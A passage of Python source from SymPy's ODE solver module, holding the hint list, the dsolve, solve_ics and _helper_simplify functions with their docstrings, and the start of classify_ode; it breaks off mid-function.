from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, Dummy, symbols
from sympy.core.sympify import sympify
from sympy.logic.boolalg import (BooleanAtom, BooleanTrue,
BooleanFalse)
from sympy.functions import cos, cosh, exp, im, log, re, sin, sinh, sqrt, \
atan2, conjugate, cbrt, besselj, bessely, airyai, airybi
from sympy.functions.combinatorial.factorials import factorial
from sympy.integrals.integrals import Integral, integrate
from sympy.matrices import wronskian
from sympy.polys import (Poly, RootOf, rootof, terms_gcd,
PolynomialError, lcm, roots, gcd)
from sympy.polys.polytools import cancel, degree, div
from sympy.series import Order
from sympy.series.series import series
from sympy.simplify import (collect, logcombine, powsimp, # type: ignore
separatevars, simplify, trigsimp, posify, cse)
from sympy.simplify.powsimp import powdenest
from sympy.simplify.radsimp import collect_const
from sympy.solvers import checksol, solve
from sympy.solvers.pde import pdsolve
from sympy.utilities import numbered_symbols, default_sort_key, sift
from sympy.utilities.iterables import uniq
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from .subscheck import sub_func_doit
#: This is a list of hints in the order that they should be preferred by
#: :py:meth:`~sympy.solvers.ode.classify_ode`. In general, hints earlier in the
#: list should produce simpler solutions than those later in the list (for
#: ODEs that fit both). For now, the order of this list is based on empirical
#: observations by the developers of SymPy.
#:
#: The hint used by :py:meth:`~sympy.solvers.ode.dsolve` for a specific ODE
#: can be overridden (see the docstring).
#:
#: In general, ``_Integral`` hints are grouped at the end of the list, unless
#: there is a method that returns an unevaluable integral most of the time
#: (which go near the end of the list anyway). ``default``, ``all``,
#: ``best``, and ``all_Integral`` meta-hints should not be included in this
#: list, but ``_best`` and ``_Integral`` hints should be included.
allhints = (
"factorable",
"nth_algebraic",
"separable",
"1st_exact",
"1st_linear",
"Bernoulli",
"Riccati_special_minus2",
"1st_homogeneous_coeff_best",
"1st_homogeneous_coeff_subs_indep_div_dep",
"1st_homogeneous_coeff_subs_dep_div_indep",
"almost_linear",
"linear_coefficients",
"separable_reduced",
"1st_power_series",
"lie_group",
"nth_linear_constant_coeff_homogeneous",
"nth_linear_euler_eq_homogeneous",
"nth_linear_constant_coeff_undetermined_coefficients",
"nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients",
"nth_linear_constant_coeff_variation_of_parameters",
"nth_linear_euler_eq_nonhomogeneous_variation_of_parameters",
"Liouville",
"2nd_linear_airy",
"2nd_linear_bessel",
"2nd_hypergeometric",
"2nd_hypergeometric_Integral",
"nth_order_reducible",
"2nd_power_series_ordinary",
"2nd_power_series_regular",
"nth_algebraic_Integral",
"separable_Integral",
"1st_exact_Integral",
"1st_linear_Integral",
"Bernoulli_Integral",
"1st_homogeneous_coeff_subs_indep_div_dep_Integral",
"1st_homogeneous_coeff_subs_dep_div_indep_Integral",
"almost_linear_Integral",
"linear_coefficients_Integral",
"separable_reduced_Integral",
"nth_linear_constant_coeff_variation_of_parameters_Integral",
"nth_linear_euler_eq_nonhomogeneous_variation_of_parameters_Integral",
"Liouville_Integral",
)
lie_heuristics = (
"abaco1_simple",
"abaco1_product",
"abaco2_similar",
"abaco2_unique_unknown",
"abaco2_unique_general",
"linear",
"function_sum",
"bivariate",
"chi"
)
def get_numbered_constants(eq, num=1, start=1, prefix='C'):
"""
Returns a list of constants that do not occur
in eq already.
"""
ncs = iter_numbered_constants(eq, start, prefix)
Cs = [next(ncs) for i in range(num)]
return (Cs[0] if num == 1 else tuple(Cs))
def iter_numbered_constants(eq, start=1, prefix='C'):
"""
Returns an iterator of constants that do not occur
in eq already.
"""
if isinstance(eq, (Expr, Eq)):
eq = [eq]
elif not iterable(eq):
raise ValueError("Expected Expr or iterable but got %s" % eq)
atom_set = set().union(*[i.free_symbols for i in eq])
func_set = set().union(*[i.atoms(Function) for i in eq])
if func_set:
atom_set |= {Symbol(str(f.func)) for f in func_set}
return numbered_symbols(start=start, prefix=prefix, exclude=atom_set)
def dsolve(eq, func=None, hint="default", simplify=True,
ics= None, xi=None, eta=None, x0=0, n=6, **kwargs):
r"""
Solves any (supported) kind of ordinary differential equation and
system of ordinary differential equations.
For single ordinary differential equation
=========================================
It is classified under this when number of equation in ``eq`` is one.
**Usage**
``dsolve(eq, f(x), hint)`` -> Solve ordinary differential equation
``eq`` for function ``f(x)``, using method ``hint``.
**Details**
``eq`` can be any supported ordinary differential equation (see the
:py:mod:`~sympy.solvers.ode` docstring for supported methods).
This can either be an :py:class:`~sympy.core.relational.Equality`,
or an expression, which is assumed to be equal to ``0``.
``f(x)`` is a function of one variable whose derivatives in that
variable make up the ordinary differential equation ``eq``. In
many cases it is not necessary to provide this; it will be
autodetected (and an error raised if it couldn't be detected).
``hint`` is the solving method that you want dsolve to use. Use
``classify_ode(eq, f(x))`` to get all of the possible hints for an
ODE. The default hint, ``default``, will use whatever hint is
returned first by :py:meth:`~sympy.solvers.ode.classify_ode`. See
Hints below for more options that you can use for hint.
``simplify`` enables simplification by
:py:meth:`~sympy.solvers.ode.ode.odesimp`. See its docstring for more
information. Turn this off, for example, to disable solving of
solutions for ``func`` or simplification of arbitrary constants.
It will still integrate with this hint. Note that the solution may
contain more arbitrary constants than the order of the ODE with
this option enabled.
``xi`` and ``eta`` are the infinitesimal functions of an ordinary
differential equation. They are the infinitesimals of the Lie group
of point transformations for which the differential equation is
invariant. The user can specify values for the infinitesimals. If
nothing is specified, ``xi`` and ``eta`` are calculated using
:py:meth:`~sympy.solvers.ode.infinitesimals` with the help of various
heuristics.
``ics`` is the set of initial/boundary conditions for the differential equation.
It should be given in the form of ``{f(x0): x1, f(x).diff(x).subs(x, x2):
x3}`` and so on. For power series solutions, if no initial
conditions are specified ``f(0)`` is assumed to be ``C0`` and the power
series solution is calculated about 0.
``x0`` is the point about which the power series solution of a differential
equation is to be evaluated.
``n`` gives the exponent of the dependent variable up to which the power series
solution of a differential equation is to be evaluated.
**Hints**
Aside from the various solving methods, there are also some meta-hints
that you can pass to :py:meth:`~sympy.solvers.ode.dsolve`:
``default``:
This uses whatever hint is returned first by
:py:meth:`~sympy.solvers.ode.classify_ode`. This is the
default argument to :py:meth:`~sympy.solvers.ode.dsolve`.
``all``:
To make :py:meth:`~sympy.solvers.ode.dsolve` apply all
relevant classification hints, use ``dsolve(ODE, func,
hint="all")``. This will return a dictionary of
``hint:solution`` terms. If a hint causes dsolve to raise the
``NotImplementedError``, value of that hint's key will be the
exception object raised. The dictionary will also include
some special keys:
- ``order``: The order of the ODE. See also
:py:meth:`~sympy.solvers.deutils.ode_order` in
``deutils.py``.
- ``best``: The simplest hint; what would be returned by
``best`` below.
- ``best_hint``: The hint that would produce the solution
given by ``best``. If more than one hint produces the best
solution, the first one in the tuple returned by
:py:meth:`~sympy.solvers.ode.classify_ode` is chosen.
- ``default``: The solution that would be returned by default.
This is the one produced by the hint that appears first in
the tuple returned by
:py:meth:`~sympy.solvers.ode.classify_ode`.
``all_Integral``:
This is the same as ``all``, except if a hint also has a
corresponding ``_Integral`` hint, it only returns the
``_Integral`` hint. This is useful if ``all`` causes
:py:meth:`~sympy.solvers.ode.dsolve` to hang because of a
difficult or impossible integral. This meta-hint will also be
much faster than ``all``, because
:py:meth:`~sympy.core.expr.Expr.integrate` is an expensive
routine.
``best``:
To have :py:meth:`~sympy.solvers.ode.dsolve` try all methods
and return the simplest one. This takes into account whether
the solution is solvable in the function, whether it contains
any Integral classes (i.e. unevaluatable integrals), and
which one is the shortest in size.
See also the :py:meth:`~sympy.solvers.ode.classify_ode` docstring for
more info on hints, and the :py:mod:`~sympy.solvers.ode` docstring for
a list of all supported hints.
**Tips**
- You can declare the derivative of an unknown function this way:
>>> from sympy import Function, Derivative
>>> from sympy.abc import x # x is the independent variable
>>> f = Function("f")(x) # f is a function of x
>>> # f_ will be the derivative of f with respect to x
>>> f_ = Derivative(f, x)
- See ``test_ode.py`` for many tests, which serves also as a set of
examples for how to use :py:meth:`~sympy.solvers.ode.dsolve`.
- :py:meth:`~sympy.solvers.ode.dsolve` always returns an
:py:class:`~sympy.core.relational.Equality` class (except for the
case when the hint is ``all`` or ``all_Integral``). If possible, it
solves the solution explicitly for the function being solved for.
Otherwise, it returns an implicit solution.
- Arbitrary constants are symbols named ``C1``, ``C2``, and so on.
- Because all solutions should be mathematically equivalent, some
hints may return the exact same result for an ODE. Often, though,
two different hints will return the same solution formatted
differently. The two should be equivalent. Also note that sometimes
the values of the arbitrary constants in two different solutions may
not be the same, because one constant may have "absorbed" other
constants into it.
- Do ``help(ode.ode_<hintname>)`` to get help more information on a
specific hint, where ``<hintname>`` is the name of a hint without
``_Integral``.
For system of ordinary differential equations
=============================================
**Usage**
``dsolve(eq, func)`` -> Solve a system of ordinary differential
equations ``eq`` for ``func`` being list of functions including
`x(t)`, `y(t)`, `z(t)` where number of functions in the list depends
upon the number of equations provided in ``eq``.
**Details**
``eq`` can be any supported system of ordinary differential equations
This can either be an :py:class:`~sympy.core.relational.Equality`,
or an expression, which is assumed to be equal to ``0``.
``func`` holds ``x(t)`` and ``y(t)`` being functions of one variable which
together with some of their derivatives make up the system of ordinary
differential equation ``eq``. It is not necessary to provide this; it
will be autodetected (and an error raised if it couldn't be detected).
**Hints**
The hints are formed by parameters returned by classify_sysode, combining
them give hints name used later for forming method name.
Examples
========
>>> from sympy import Function, dsolve, Eq, Derivative, sin, cos, symbols
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(Derivative(f(x), x, x) + 9*f(x), f(x))
Eq(f(x), C1*sin(3*x) + C2*cos(3*x))
>>> eq = sin(x)*cos(f(x)) + cos(x)*sin(f(x))*f(x).diff(x)
>>> dsolve(eq, hint='1st_exact')
[Eq(f(x), -acos(C1/cos(x)) + 2*pi), Eq(f(x), acos(C1/cos(x)))]
>>> dsolve(eq, hint='almost_linear')
[Eq(f(x), -acos(C1/cos(x)) + 2*pi), Eq(f(x), acos(C1/cos(x)))]
>>> t = symbols('t')
>>> x, y = symbols('x, y', cls=Function)
>>> eq = (Eq(Derivative(x(t),t), 12*t*x(t) + 8*y(t)), Eq(Derivative(y(t),t), 21*x(t) + 7*t*y(t)))
>>> dsolve(eq)
[Eq(x(t), C1*x0(t) + C2*x0(t)*Integral(8*exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)**2, t)),
Eq(y(t), C1*y0(t) + C2*(y0(t)*Integral(8*exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)**2, t) +
exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)))]
>>> eq = (Eq(Derivative(x(t),t),x(t)*y(t)*sin(t)), Eq(Derivative(y(t),t),y(t)**2*sin(t)))
>>> dsolve(eq)
{Eq(x(t), -exp(C1)/(C2*exp(C1) - cos(t))), Eq(y(t), -1/(C1 - cos(t)))}
"""
if iterable(eq):
from sympy.solvers.ode.systems import dsolve_system
# This may have to be changed in future
# when we have weakly and strongly
# connected components. This have to
# changed to show the systems that haven't
# been solved.
try:
sol = dsolve_system(eq, funcs=func, ics=ics)
return sol[0] if len(sol) == 1 else sol
except NotImplementedError:
pass
match = classify_sysode(eq, func)
eq = match['eq']
order = match['order']
func = match['func']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
# keep highest order term coefficient positive
for i in range(len(eq)):
for func_ in func:
if isinstance(func_, list):
pass
else:
if eq[i].coeff(diff(func[i],t,ode_order(eq[i], func[i]))).is_negative:
eq[i] = -eq[i]
match['eq'] = eq
if len(set(order.values()))!=1:
raise ValueError("It solves only those systems of equations whose orders are equal")
match['order'] = list(order.values())[0]
def recur_len(l):
return sum(recur_len(item) if isinstance(item,list) else 1 for item in l)
if recur_len(func) != len(eq):
raise ValueError("dsolve() and classify_sysode() work with "
"number of functions being equal to number of equations")
if match['type_of_equation'] is None:
raise NotImplementedError
else:
if match['is_linear'] == True:
solvefunc = globals()['sysode_linear_%(no_of_equation)seq_order%(order)s' % match]
else:
solvefunc = globals()['sysode_nonlinear_%(no_of_equation)seq_order%(order)s' % match]
sols = solvefunc(match)
if ics:
constants = Tuple(*sols).free_symbols - Tuple(*eq).free_symbols
solved_constants = solve_ics(sols, func, constants, ics)
return [sol.subs(solved_constants) for sol in sols]
return sols
else:
given_hint = hint # hint given by the user
# See the docstring of _desolve for more details.
hints = _desolve(eq, func=func,
hint=hint, simplify=True, xi=xi, eta=eta, type='ode', ics=ics,
x0=x0, n=n, **kwargs)
eq = hints.pop('eq', eq)
all_ = hints.pop('all', False)
if all_:
retdict = {}
failed_hints = {}
gethints = classify_ode(eq, dict=True)
orderedhints = gethints['ordered_hints']
for hint in hints:
try:
rv = _helper_simplify(eq, hint, hints[hint], simplify)
except NotImplementedError as detail:
failed_hints[hint] = detail
else:
retdict[hint] = rv
func = hints[hint]['func']
retdict['best'] = min(list(retdict.values()), key=lambda x:
ode_sol_simplicity(x, func, trysolving=not simplify))
if given_hint == 'best':
return retdict['best']
for i in orderedhints:
if retdict['best'] == retdict.get(i, None):
retdict['best_hint'] = i
break
retdict['default'] = gethints['default']
retdict['order'] = gethints['order']
retdict.update(failed_hints)
return retdict
else:
# The key 'hint' stores the hint needed to be solved for.
hint = hints['hint']
return _helper_simplify(eq, hint, hints, simplify, ics=ics)
def _helper_simplify(eq, hint, match, simplify=True, ics=None, **kwargs):
r"""
Helper function of dsolve that calls the respective
:py:mod:`~sympy.solvers.ode` functions to solve for the ordinary
differential equations. This minimizes the computation in calling
:py:meth:`~sympy.solvers.deutils._desolve` multiple times.
"""
r = match
func = r['func']
order = r['order']
match = r[hint]
if isinstance(match, SingleODESolver):
solvefunc = match
elif hint.endswith('_Integral'):
solvefunc = globals()['ode_' + hint[:-len('_Integral')]]
else:
solvefunc = globals()['ode_' + hint]
free = eq.free_symbols
cons = lambda s: s.free_symbols.difference(free)
if simplify:
# odesimp() will attempt to integrate, if necessary, apply constantsimp(),
# attempt to solve for func, and apply any other hint specific
# simplifications
if isinstance(solvefunc, SingleODESolver):
sols = solvefunc.get_general_solution()
else:
sols = solvefunc(eq, func, order, match)
if iterable(sols):
rv = [odesimp(eq, s, func, hint) for s in sols]
else:
rv = odesimp(eq, sols, func, hint)
else:
# We still want to integrate (you can disable it separately with the hint)
if isinstance(solvefunc, SingleODESolver):
exprs = solvefunc.get_general_solution(simplify=False)
else:
match['simplify'] = False # Some hints can take advantage of this option
exprs = solvefunc(eq, func, order, match)
if isinstance(exprs, list):
rv = [_handle_Integral(expr, func, hint) for expr in exprs]
else:
rv = _handle_Integral(exprs, func, hint)
if isinstance(rv, list):
rv = _remove_redundant_solutions(eq, rv, order, func.args[0])
if len(rv) == 1:
rv = rv[0]
if ics and not 'power_series' in hint:
if isinstance(rv, (Expr, Eq)):
solved_constants = solve_ics([rv], [r['func']], cons(rv), ics)
rv = rv.subs(solved_constants)
else:
rv1 = []
for s in rv:
try:
solved_constants = solve_ics([s], [r['func']], cons(s), ics)
except ValueError:
continue
rv1.append(s.subs(solved_constants))
if len(rv1) == 1:
return rv1[0]
rv = rv1
return rv
def solve_ics(sols, funcs, constants, ics):
"""
Solve for the constants given initial conditions
``sols`` is a list of solutions.
``funcs`` is a list of functions.
``constants`` is a list of constants.
``ics`` is the set of initial/boundary conditions for the differential
equation. It should be given in the form of ``{f(x0): x1,
f(x).diff(x).subs(x, x2): x3}`` and so on.
Returns a dictionary mapping constants to values.
``solution.subs(constants)`` will replace the constants in ``solution``.
Example
=======
>>> # From dsolve(f(x).diff(x) - f(x), f(x))
>>> from sympy import symbols, Eq, exp, Function
>>> from sympy.solvers.ode.ode import solve_ics
>>> f = Function('f')
>>> x, C1 = symbols('x C1')
>>> sols = [Eq(f(x), C1*exp(x))]
>>> funcs = [f(x)]
>>> constants = [C1]
>>> ics = {f(0): 2}
>>> solved_constants = solve_ics(sols, funcs, constants, ics)
>>> solved_constants
{C1: 2}
>>> sols[0].subs(solved_constants)
Eq(f(x), 2*exp(x))
"""
# Assume ics are of the form f(x0): value or Subs(diff(f(x), x, n), (x,
# x0)): value (currently checked by classify_ode). To solve, replace x
# with x0, f(x0) with value, then solve for constants. For f^(n)(x0),
# differentiate the solution n times, so that f^(n)(x) appears.
x = funcs[0].args[0]
diff_sols = []
subs_sols = []
diff_variables = set()
for funcarg, value in ics.items():
if isinstance(funcarg, AppliedUndef):
x0 = funcarg.args[0]
matching_func = [f for f in funcs if f.func == funcarg.func][0]
S = sols
elif isinstance(funcarg, (Subs, Derivative)):
if isinstance(funcarg, Subs):
# Make sure it stays a subs. Otherwise subs below will produce
# a different looking term.
funcarg = funcarg.doit()
if isinstance(funcarg, Subs):
deriv = funcarg.expr
x0 = funcarg.point[0]
variables = funcarg.expr.variables
matching_func = deriv
elif isinstance(funcarg, Derivative):
deriv = funcarg
x0 = funcarg.variables[0]
variables = (x,)*len(funcarg.variables)
matching_func = deriv.subs(x0, x)
if variables not in diff_variables:
for sol in sols:
if sol.has(deriv.expr.func):
diff_sols.append(Eq(sol.lhs.diff(*variables), sol.rhs.diff(*variables)))
diff_variables.add(variables)
S = diff_sols
else:
raise NotImplementedError("Unrecognized initial condition")
for sol in S:
if sol.has(matching_func):
sol2 = sol
sol2 = sol2.subs(x, x0)
sol2 = sol2.subs(funcarg, value)
# This check is necessary because of issue #15724
if not isinstance(sol2, BooleanAtom) or not subs_sols:
subs_sols = [s for s in subs_sols if not isinstance(s, BooleanAtom)]
subs_sols.append(sol2)
# TODO: Use solveset here
try:
solved_constants = solve(subs_sols, constants, dict=True)
except NotImplementedError:
solved_constants = []
# XXX: We can't differentiate between the solution not existing because of
# invalid initial conditions, and not existing because solve is not smart
# enough. If we could use solveset, this might be improvable, but for now,
# we use NotImplementedError in this case.
if not solved_constants:
raise ValueError("Couldn't solve for initial conditions")
if solved_constants == True:
raise ValueError("Initial conditions did not produce any solutions for constants. Perhaps they are degenerate.")
if len(solved_constants) > 1:
raise NotImplementedError("Initial conditions produced too many solutions for constants")
return solved_constants[0]
def classify_ode(eq, func=None, dict=False, ics=None, **kwargs):
r"""
Returns a tuple of possible :py:meth:`~sympy.solvers.ode.dsolve`
classifications for an ODE.
The tuple is ordered so that first item is the classification that
:py:meth:`~sympy.solvers.ode.dsolve` uses to solve the ODE by default. In
general, classifications at the near the beginning of the list will
produce better solutions faster than those near the end, thought there are
always exceptions. To make :py:meth:`~sympy.solvers.ode.dsolve` use a
different classification, use ``dsolve(ODE, func,
hint=<classification>)``. See also the
:py:meth:`~sympy.solvers.ode.dsolve` docstring for different meta-hints
you can use.
If ``dict`` is true, :py:meth:`~sympy.solvers.ode.classify_ode` will
return a dictionary of ``hint:match`` expression terms. This is intended
for internal use by :py:meth:`~sympy.solvers.ode.dsolve`. Note that
because dictionaries are ordered arbitrarily, this will most likely not be
in the same order as the tuple.
You can get help on different hints by executing
``help(ode.ode_hintname)``, where ``hintname`` is the name of the hint
without ``_Integral``.
See :py:data:`~sympy.solvers.ode.allhints` or the
:py:mod:`~sympy.solvers.ode` docstring for a list of all supported hints
that can be returned from :py:meth:`~sympy.solvers.ode.classify_ode`.
Notes
=====
These are remarks on hint names.
``_Integral``
If a classification has ``_Integral`` at the end, it will return the
expression with an unevaluated :py:class:`~.Integral`
class in it. Note that a hint may do this anyway if
:py:meth:`~sympy.core.expr.Expr.integrate` cannot do the integral,
though just using an ``_Integral`` will do so much faster. Indeed, an
``_Integral`` hint will always be faster than its corresponding hint
without ``_Integral`` because
:py:meth:`~sympy.core.expr.Expr.integrate` is an expensive routine.
If :py:meth:`~sympy.solvers.ode.dsolve` hangs, it is probably because
:py:meth:`~sympy.core.expr.Expr.integrate` is hanging on a tough or
impossible integral. Try using an ``_Integral`` hint or
``all_Integral`` to get it return something.
Note that some hints do not have ``_Integral`` counterparts. This is
because :py:func:`~sympy.integrals.integrals.integrate` is not used in
solving the ODE for those method. For example, `n`\th order linear
homogeneous ODEs with constant coefficients do not require integration
to solve, so there is no
``nth_linear_homogeneous_constant_coeff_Integrate`` hint. You can
easily evaluate any unevaluated
:py:class:`~sympy.integrals.integrals.Integral`\s in an expression by
doing ``expr.doit()``.
Ordinals
Some hints contain an ordinal such as ``1st_linear``. This is to help
differentiate them from other hints, as well as from other methods
that may not be implemented yet. If a hint has ``nth`` in it, such as
the ``nth_linear`` hints, this means that the method used to applies
to ODEs of any order.
``indep`` and ``dep``
Some hints contain the words ``indep`` or ``dep``. These reference
the independent variable and the dependent function, respectively. For
example, if an ODE is in terms of `f(x)`, then ``indep`` will refer to
`x` and ``dep`` will refer to `f`.
``subs``
If a hints has the word ``subs`` in it, it means the the ODE is solved
by substituting the expression given after the word ``subs`` for a
single dummy variable. This is usually in terms of ``indep`` and
``dep`` as above. The substituted expression will be written only in
characters allowed for names of Python objects, meaning operators will
be spelled out. For example, ``indep``/``dep`` will be written as
``indep_div_dep``.
``coeff``
The word ``coeff`` in a hint refers to the coefficients of something
in the ODE, usually of the derivative terms. See the docstring for
the individual methods for more info (``help(ode)``). This is
contrast to ``coefficients``, as in ``undetermined_coefficients``,
which refers to the common name of a method.
``_best``
Methods that have more than one fundamental way to solve will have a
hint for each sub-method and a ``_best`` meta-classification. This
will evaluate all hints and return the best, using the same
considerations as the normal ``best`` meta-hint.
Examples
========
>>> from sympy import Function, classify_ode, Eq
>>> from sympy.abc import x
>>> f = Function('f')
>>> classify_ode(Eq(f(x).diff(x), 0), f(x))
('nth_algebraic',
'separable',
'1st_linear',
'Bernoulli',
'1st_homogeneous_coeff_best',
'1st_homogeneous_coeff_subs_indep_div_dep',
'1st_homogeneous_coeff_subs_dep_div_indep',
'1st_power_series', 'lie_group', 'nth_linear_constant_coeff_homogeneous',
'nth_linear_euler_eq_homogeneous',
'nth_algebraic_Integral', 'separable_Integral',
'1st_linear_Integral', 'Bernoulli_Integral',
'1st_homogeneous_coeff_subs_indep_div_dep_Integral',
'1st_homogeneous_coeff_subs_dep_div_indep_Integral')
>>> classify_ode(f(x).diff(x, 2) + 3*f(x).diff(x) + 2*f(x) - 4)
('nth_linear_constant_coeff_undetermined_coefficients',
'nth_linear_constant_coeff_variation_of_parameters',
'nth_linear_constant_coeff_variation_of_parameters_Integral')
"""
ics = sympify(ics)
prep = kwargs.pop('prep', True)
if func and len(func.args) != 1:
raise ValueError("dsolve() and classify_ode() only "
"work with functions of one variable, not %s" % func)
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
# Some methods want the unprocessed equation
eq_orig = eq
if prep or func is None:
eq, func_ = _preprocess(eq, func)
if func is None:
func = func_
x = func.args[0]
f = func.func
y = Dummy('y')
xi = kwargs.get('xi')
eta = kwargs.get('eta')
terms = kwargs.get('n')
order = ode_order(eq, f(x))
# hint:matchdict or hint:(tuple of matchdicts)
# Also will contain "default":<default hint> and "order":order items.
matching_hints = {"order": order}
df = f(x).diff(x)
a = Wild('a', exclude=[f(x)])
d = Wild('d', exclude=[df, f(x).diff(x, 2)])
e = Wild('e', exclude=[df])
k = Wild('k', exclude=[df])
n = Wild('n', exclude=[x, f(x), df])
c1 = Wild('c1', exclude=[x])
a3 = Wild('a3', exclude=[f(x), df, f(x).diff(x, 2)])
b3 = Wild('b3', exclude=[f(x), df, f(x).diff(x, 2)])
c3 = Wild('c3', exclude=[f(x), df, f(x).diff(x, 2)])
r3 = {'xi': xi, 'eta': eta} # Used for the lie_group hint
boundary = {} # Used to extract initial conditions
C1 = Symbol("C1")
# Preprocessing to get the initial conditions out
if ics is not None:
for funcarg in ics:
# Separating derivatives
if isinstance(funcarg, (Subs, Derivative)):
# f(x).diff(x).subs(x, 0) is a Subs, but f(x).diff(x).subs(x,
# y) is a Derivative
if isinstance(funcarg, Subs):
deriv = funcarg.expr
old = funcarg.variables[0]
new = funcarg.point[0]
elif isinstance(funcarg, Derivative):
deriv = funcarg
# No information on this. Just assume it was x
old = x
new = funcarg.variables[0]
if (isinstance(deriv, Derivative) and isinstance(deriv.args[0],
AppliedUndef) and deriv.args[0].func == f and
len(deriv.args[0].args) == 1 and old == x and not
new.has(x) and all(i == deriv.variables[0] for i in
deriv.variables) and not ics[funcarg].has(f)):
dorder = ode_order(deriv, x)
temp = 'f' + str(dorder)
boundary.update({temp: new, temp + 'val': ics[funcarg]})
else:
raise ValueError("Enter valid boundary conditions for Derivatives")
# Separating functions
elif isinstance(funcarg, AppliedUndef):
if (funcarg.func == f and len(funcarg.args) == 1 and
not funcarg.args[0].has(x) and not ics[funcarg].has(f)):
boundary.update({'f0': funcarg.args[0], 'f0val': ics[funcarg]})
else:
raise ValueError("Enter valid boundary conditions for Function")
else:
raise ValueError("Enter boundary conditions of the form ics={f(point}: value, f(x).diff(x, order).subs(x, point): value}")
# Any ODE that can be solved with a combination of algebra and
# integrals e.g.:
# d^3/dx^3(x y) = F(x)
ode = SingleODEProblem(eq_orig, func, x, prep=prep)
solvers = {
NthAlgebraic: ('nth_algebraic',),
FirstLinear: ('1st_linear',),
AlmostLinear: ('almost_linear',),
Bernoulli: ('Bernoulli',),
Factorable: ('factorable',),
RiccatiSpecial: ('Riccati_special_minus2',),
}
for solvercls in solvers:
solver = solvercls(ode)
if solver.matches():
for hints in solvers[solvercls]:
matching_hints[hints] = solver
if solvercls.has_integral:
matching_hints[hints + "_Integral"] = solver
eq = expand(eq)
# Precondition to try remove f(x) from highest order derivative
reduced_eq = None
if eq.is_Add:
deriv_coef = eq.coeff(f(x).diff(x, order))
if deriv_coef not in (1, 0):
r = deriv_coef.match(a*f(x)**c1)
if r and r[c1]:
den = f(x)**r[c1]
reduced_eq = Add(*[arg/den for arg in eq.args])
if not reduced_eq:
reduced_eq = eq
if order == 1:
# NON-REDUCED FORM OF EQUATION matches
r = collect(eq, df, exact=True).match(d + e * df)
if r:
r['d'] = d
r['e'] = e
r['y'] = y
r[d] = r[d].subs(f(x), y)
r[e] = r[e].subs(f(x), y)
# FIRST ORDER POWER SERIES WHICH NEEDS INITIAL CONDITIONS
# TODO: Hint first order series should match only if d/e is analytic.
# For now, only d/e and (d/e).diff(arg) is checked for existence at
# at a given point.
# This is currently done internally in ode_1st_power_series.
point = boundary.get('f0', 0)
value = boundary.get('f0val', C1)
check = cancel(r[d]/r[e])
check1 = check.subs({x: point, y: value})
if not check1.has(oo) and not check1.has(zoo) and \
not check1.has(NaN) and not check1.has(-oo):
check2 = (check1.diff(x)).subs({x: point, y: value})
if not check2.has(oo) and not check2.has(zoo) and \
not check2.has(NaN) and not check2.has(-oo):
rseries = r.copy()
rseries.update({'terms': terms, 'f0': point, 'f0val': value})
matching_hints["1st_power_series"] = rseries
r3.update(r)
## Exact Differential Equation: P(x, y) + Q(x, y)*y' = 0 where
# dP/dy == dQ/dx
try:
if r[d] != 0:
numerator = simplify(r[d].diff(y) - r[e].diff(x))
# The following few conditions try to convert a non-exact
# differential equation into an exact one.
# References : Differential equations with applications
# and historical notes - George E. Simmons
if numerator:
# If (dP/dy - dQ/dx) / Q = f(x)
# then exp(integral(f(x))*equation becomes exact
factor = simplify(numerator/r[e])
variables = factor.free_symbols
if len(variables) == 1 and x == variables.pop():
factor = exp(Integral(factor).doit())
r[d] *= factor
r[e] *= factor
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
else:
# If (dP/dy - dQ/dx) / -P = f(y)
# then exp(integral(f(y))*equation becomes exact
factor = simplify(-numerator/r[d])
variables = factor.free_symbols
if len(variables) == 1 and y == variables.pop():
factor = exp(Integral(factor).doit())
r[d] *= factor
r[e] *= factor
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
else:
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
except NotImplementedError:
# Differentiating the coefficients might fail because of things
# like f(2*x).diff(x). See issue 4624 and issue 4719.
pass
# Any first order ODE can be ideally solved by the Lie Group
# method
matching_hints["lie_group"] = r3
# This match is used for several cases below; we now collect on
# f(x) so the matching works.
r = collect(reduced_eq, df, exact=True).match(d + e*df)
if r:
# Using r[d] and r[e] without any modification for hints
# linear-coefficients and separable-reduced.
num, den = r[d], r[e] # ODE = d/e + df
r['d'] = d
r['e'] = e
r['y'] = y
r[d] = num.subs(f(x), y)
r[e] = den.subs(f(x), y)
## Separable Case: y' == P(y)*Q(x)
r[d] = separatevars(r[d])
r[e] = separatevars(r[e])
# m1[coeff]*m1[x]*m1[y] + m2[coeff]*m2[x]*m2[y]*y'
m1 = separatevars(r[d], dict=True, symbols=(x, y))
m2 = separatevars(r[e], dict=True, symbols=(x, y))
if m1 and m2:
r1 = {'m1': m1, 'm2': m2, 'y': y}
matching_hints["separable"] = r1
matching_hints["separable_Integral"] = r1
## First order equation with homogeneous coefficients:
# dy/dx == F(y/x) or dy/dx == F(x/y)
ordera = homogeneous_order(r[d], x, y)
if ordera is not None:
orderb = homogeneous_order(r[e], x, y)
if ordera == orderb:
# u1=y/x and u2=x/y
u1 = Dummy('u1')
u2 = Dummy('u2')
s = "1st_homogeneous_coeff_subs"
s1 = s + "_dep_div_indep"
s2 = s + "_indep_div_dep"
if simplify((r[d] + u1*r[e]).subs({x: 1, y: u1})) != 0:
matching_hints[s1] = r
matching_hints[s1 + "_Integral"] = r
if simplify((r[e] + u2*r[d]).subs({x: u2, y: 1})) != 0:
matching_hints[s2] = r
matching_hints[s2 + "_Integral"] = r
if s1 in matching_hints and s2 in matching_hints:
matching_hints["1st_homogeneous_coeff_best"] = r
## Linear coefficients of the form
# y'+ F((a*x + b*y + c)/(a'*x + b'y + c')) = 0
# that can be reduced to homogeneous form.
F = num/den
params = _linear_coeff_match(F, func)
if params:
xarg, yarg = params
u = Dummy('u')
t = Dummy('t')
# Dummy substitution for df and f(x).
dummy_eq = reduced_eq.subs(((df, t), (f(x), u)))
reps = ((x, x + xarg), (u, u + yarg), (t, df), (u, f(x)))
dummy_eq = simplify(dummy_eq.subs(reps))
# get the re-cast values for e and d
